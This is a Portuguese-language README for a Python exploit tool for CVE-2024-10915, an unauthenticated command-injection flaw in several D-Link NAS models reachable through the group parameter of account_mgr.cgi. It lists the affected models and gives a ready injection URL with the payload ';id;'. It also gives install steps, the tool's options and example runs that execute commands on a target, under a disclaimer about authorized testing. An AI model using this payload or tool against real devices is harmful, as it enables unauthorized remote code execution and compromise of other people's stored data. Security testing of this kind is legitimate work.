
Exploit baseado em Python para CVE-2024-10915, uma vulnerabilidade de injeção de comandos em dispositivos D-Link NAS. Executa comandos arbitrários do sistema através do endpoint /cgi-bin/account_mgr.cgi para testes de segurança autorizados.
Este exploit baseado em Python visa uma vulnerabilidade de injeção de comandos em vários produtos NAS D-Link através do endpoint /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. A vulnerabilidade permite que atacantes não autenticados executem comandos arbitrários no sistema do dispositivo afetado.
CVE-2024-10915 afeta vários modelos de NAS D-Link. Um atacante pode injetar comandos através do parâmetro group no comando cgi_user_add, levando à execução remota de código.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
Endpoint Vulnerável: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
biblioteca requests
Instale as dependências necessárias:
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
| Option | Description |
|---|---|
-u / --url | URL base do alvo (ex.: http://192.168.1.100) |
-c / --command | Comando a executar no dispositivo (padrão: id) |
-p / --proxy | Use um proxy HTTP (ex.: http://127.0.0.1:8080) |
-o / --output | Salvar a resposta HTTP em um arquivo |
-l / --list | Listar produtos NAS D-Link afetados |
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt

python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt

Este projeto destina-se apenas a fins educacionais e de testes autorizados. Não utilize esta ferramenta em redes ou sistemas para os quais você não tenha permissão explícita. Os autores não assumem qualquer responsabilidade por uso indevido ou danos causados.